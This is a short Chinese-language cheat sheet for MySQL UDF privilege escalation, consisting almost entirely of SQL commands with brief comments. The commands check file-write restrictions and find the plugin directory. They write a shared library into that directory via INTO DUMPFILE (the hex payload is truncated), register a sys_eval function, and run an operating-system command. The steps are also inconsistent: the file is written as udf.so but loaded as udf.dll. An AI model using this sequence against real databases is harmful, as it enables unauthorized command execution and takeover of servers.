MySQL UDF 提权对应的参考文章:MySQL 漏洞利用与提权,另外顺便附上t00ls UDF.PHP
show global variables like '%secure_file_priv%';
-- NULL: 不允许导入或导出
-- /tmp: 只允许导入导出到/tmp目录
-- 空: 不限制目录
show variables like '%plugin%';
-- 获取MySQL 的插件目录
select @@basedir;
-- 获取Mysql安装目录
SELECT 0x7f454c4602... INTO DUMPFILE '/usr/lib/mysql/plugin/udf.so';
-- 写入动态链接库
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';
-- 创建自定义函数
select sys_eval('whoami');
-- 执行命令